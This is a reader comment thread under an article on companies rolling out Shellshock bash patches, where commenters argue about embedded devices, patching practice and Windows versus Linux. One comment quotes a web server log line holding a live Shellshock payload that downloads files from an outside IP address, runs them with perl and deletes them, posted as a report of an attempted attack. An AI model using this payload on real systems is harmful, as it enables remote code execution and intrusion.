back to article SHELLSHOCKED: Fortune 1000 outfits Bash out batches of patches

The majority of Fortune 1000 and Global 2000 companies have already deployed, or are now deploying, Shellshock patches to fend off code attacks, according to cloud security firm CloudPassage. The Shellshock vulnerability allows remote attackers to execute arbitrary code on servers using a variety of techniques, with the CVE- …

  1. Jim 59

    Carson Sweet (excellent name) stop telling everyone that embedded devices like "TVs to soda machines" are vulnerable. They run Busybox Ash, not Bash. Or if you know any that do run bash, say which.

    To any poor citizens half way up a ladder clawing their IP cameras off the wall - LEAVE IT. Go check your web servers instead.

    1. Doctor Syntax Silver badge

      @ Jim 59

      If you think about it he's performing a useful service in telling the world about the competence of his company.

    2. Anonymous Coward
      Anonymous Coward

      I imagine that Microsoft consultancies are having a very busy week quoting for migrations to Windows Server / IIS. After Open SSL this must be the final straw for lots of current OSS users.

      1. vagabondo

        @AC re: MS consultants

        " Microsoft consultancies are having a very busy week "

        Do you know any Microsoft consultants that offer a credible no-bugs guarantee? Or even a SLA that specifies security patches within 5 days of discovery?

        1. Graham 24

          Re: @AC re: MS consultants

          I don't know of any Linux distributions (or any operating system for that matter) that offers those either.

          There may well be a large amount of "the grass is greener over there" being applied, though, which may well drive some changes.

      2. Anonymous Coward
        Anonymous Coward

        > After Open SSL this must be the final straw for lots of current OSS users.

        You mean the OpenSSL that was a problem for Windows machines as well?

        1. Anonymous Coward
          Anonymous Coward

          >You mean the OpenSSL that was a problem for Windows machines as well?

          Only on those Windows machines where some moron had installed OpenSSL, because everyone knos Open Source is more secure than the native MS SSL service.

        2. Anonymous Coward
          Anonymous Coward

          "You mean the OpenSSL that was a problem for Windows machines as well?"

          Windows does not use Open SSL. It has much faster and more secure inbuilt SSL libraries.

      3. Anonymous Coward
        Anonymous Coward

        I imagine that Microsoft consultancies are having a very busy week quoting for migrations to Windows Server / IIS. After Open SSL this must be the final straw for lots of current OSS users.

        You know, I'm not even going to retype my answer:

        That comment deserves nothing more than recycled keystrokes

        1. Anonymous Coward
          Anonymous Coward

          "You know, I'm not even going to retype my answer:"

          Thanks for sparing us - what a load of verbage that was.

          The facts are that Windows Server based webservers are 4-5 times less likely to be remotely exploited than Linux based ones according to defacement statistics - and that Windows Server has far fewer security vulnerabilities to evaluate and patch than enterprise Linux distributions - and Windows Server has a faster average fix time and fewer days at risk than enterprise Linux distributions like Red Hat and SUSE.

          The is largely why Windows Server / IIS is now the most popular web server platform by market share.

          The recent Open SSL and BASH demonstrations that the long standing claims that OSS is somehow more secure because lots of people can view the code as being complete and utter bollocks can only accelerate the current trend of migrations to Windows Server ....

    3. Anonymous Coward
      Anonymous Coward

      Don't forget water dispensers too.

  2. Camilla Smythe

    Fortune 1000 overlords SHELLSHOCKED into Bash patch batch

    Meh..? Obviously I am dumb but doesn't 'update manager', or some other bit of tut, moan at people to update bits such as this or is the article suggesting 'Fortune 1000 Overlords' ignore such advice until they crap a load of someone else's money over to crooks, themselves, and then pay themselves bigger bonuses?

    1. Graham 24

      Re: Fortune 1000 overlords SHELLSHOCKED into Bash patch batch

      The trouble is, you really don't want to get notified every time one of packages that's installed on a typical Linux system is updated in one of the main repos. The signal-to-noise ratio would render such notifications useless.

      Very few systems are truly "up to date" in that all the software is the very latest that's available. This is even more true for corporate production servers, which tend to be conservatively managed, with a preference for stability over security.

      1. Doctor Syntax Silver badge

        Re: Fortune 1000 overlords SHELLSHOCKED into Bash patch batch

        "The trouble is, you really don't want to get notified every time one of packages that's installed on a typical Linux system is updated in one of the main repos. The signal-to-noise ratio would render such notifications useless."

        Why not? There was a batch of Debian updates this morning. Open a terminal, apt-get upgrade, check what it was - latest version of Chromium, OK it, download and install, job done in a few seconds, close terminal. It's not like the monthly Win 7 updates which seem to take hours and need a few reboots along the way.

        Agreed servers are another kettle of fish entirely but that's because you'd need to check the updates don't break anything and the occasional kernel upgrade would need a reboot but in general distros aimed at servers have quite conservative attitudes to upgrades.

      2. vagabondo

        Re: Fortune 1000 overlords SHELLSHOCKED into Bash patch batch

        "you really don't want to get notified every time one of packages that's installed "

        That's not the point. We keep all of our critical systems on stable, long-term tested software versions, except we apply security patches automatically within 24 hours of their release. These are normally backports, and do not push our software to the latest packages. This is a standard feature of serious distributions and is trivial to implement. The risk of a security patch tacking a system down is trivial compared to the potential consequences of leaving a known vulnerability open.

        1. Graham 24

          Re: Fortune 1000 overlords SHELLSHOCKED into Bash patch batch

          "all of our critical systems on stable, long-term tested software"

          "apply security patches automatically within 24 hours of their release"

          The first is sensible, but can't be true if the second is true. It can't be really considered stable if you change it as soon as a security fix comes out.

          "The risk of a security patch tacking a system down is trivial compared to the potential consequences of leaving a known vulnerability open."

          Not sure I'd agree with that. I'd agree it's probably less, but there's many a bug been introduced because someone was in a hurry to get a patch out. The original ShellShock patch has undergone at least two modifications after its initial release.

  3. Jim 59

    Meanwhile, on a web server that was already patched twice

    173.45.100.18 - - [28/Sep/2014:17:27:34 +0100] "GET /cgi-bin/hi HTTP/1.0" 404 491 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

    1. bob, mon!
      WTF?

      Re: Meanwhile, on a web server that was already patched twice

      Why the downvotes? It looks to me like Jim 59 is just reporting that someone attempted the crack on his webserver. He says the machine's already patched....

      1. Anonymous Coward
        Anonymous Coward

        Re: Meanwhile, on a web server that was already patched twice

        Indeed, I suppose it's people who think such patches should make those crack-attempts invisible. Or those who maybe wish their commercial software supplier was as swift delivering fixes.

        I find it rather telling that this apparently 20+-year old bug has only just started being exploited within the last week.

        I've certainly seen a few attempts myself now.

      2. Jim 59

        Re: Meanwhile, on a web server that was already patched twice

        Yes. It was a line from an Apache log showing some kiddy from Ohio trying to exploit the bug. It has taken the script kiddies three times as long to learn the exploit than it took the distros to publish the patches.

        1. Anonymous Coward
          Anonymous Coward

          Re: Meanwhile, on a web server that was already patched twice

          "It has taken the script kiddies three times as long to learn the exploit than it took the distros to publish the patches."

          Except that the first 2 patches didn't work. And my money is on yet more holes being found. The only real solution is migrate to something more secure like Windows Server (or Open BSD if you prefer to use a legacy / *NIX type OS.)

  4. a_mu

    nas and modems

    How does this affect the 1001 NAS, media server, TV's and modems around that run a version of Linux,

    Are we going to have to re flash all our devices around the house,

    any one un patched one is the network open is it not !

    EEK,

    1. Doctor Syntax Silver badge

      Re: nas and modems

      Read Jim 59's first post above.

    2. Anonymous Coward
      Anonymous Coward

      Re: nas and modems

      How does this affect the 1001 NAS, media server, TV's and modems around that run a version of Linux

      Like This.

      Very few of those devices actually have the OS-image storage for a full-blown GNU/Linux distribution. Most are a cut-down Linux OS based around Busybox, which according to that test I did, isn't vulnerable.

      Even a NAS, which may have big HDDs installed, won't be using those HDDs for the OS, it'll have a small flash chip somewhere with a minimal OS on it.

      1. Sandtitz Silver badge
        Unhappy

        Re: nas and modems @Stuart Longland

        "Even a NAS, which may have big HDDs installed, won't be using those HDDs for the OS, it'll have a small flash chip somewhere with a minimal OS on it."

        The "minimal OS" may be minimal compared to any desktop OS but those OS firmware downloads are often 100+ MB in size and in general reside on the HDD.

        A cursory search reveals that at least the following manufacturers use or have used Bash in their NAS products.

        - Synology

        - Thecus

        - QNAP

        - Buffalo

        - Seagate

        - Lacie

        1. Jim 59

          Re: nas and modems @Stuart Longland

          Hi Sandtitz could you name some products found in your 'cursory search' to be using bash.

          My Buffalo Linkstation Live NAS uses Busybox/ash.

          1. Sandtitz Silver badge

            Re: nas and modems @Jim

            Sure, I basically googled product + bash:

            Synology has issued an advisory for the Bash issues.

            Ditto for QNAP.

            I couldn't find anything official for Thecus, but users at their forum are reporting that their Bash shells are vulnerable.

            "Buffalo Linkstation hacked using Bash" reported here.

            This is a bit of conjecture but for Seagate at least the GoFlex NAS has a script available that specifically calls for /bin/bash.

            As it happens I cannot find anything for Lacie - perhaps I misread some forum posts, sorry for that!

        2. Anonymous Coward
          Anonymous Coward

          Re: nas and modems @Stuart Longland

          Indeed, it'll be more substantial than that of a router, because it probably has Samba for Windows File Sharing, some media streaming tools, web/FTP server, etc…

          This does not necessarily mean that bash is being used. You'll need filesystem access to actually know for sure, just looking at the size of the firmware blob isn't going to tell you.

  5. Levente Szileszky

    It's not one patch but actually FOUR (4) CVEs...

    ...at least according to Red Hat:

    CVE-2014-6271

    CVE-2014-7169

    CVE-2014-7186

    CVE-2014-7187

    More details here: https://securityblog.redhat.com/2014/09/26/frequently-asked-questions-about-the-shellshock-bash-flaws/

    1. Anonymous Coward
      Anonymous Coward

      Re: It's not one patch but actually FOUR (4) CVEs...

      Red Hat are 2 behind then. It's now 6 CVEs!

  6. RedneckMother

    "Unix\Linux" (in article text)

    <insert Michael Palin voice> Ooh! What a giveaway!

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon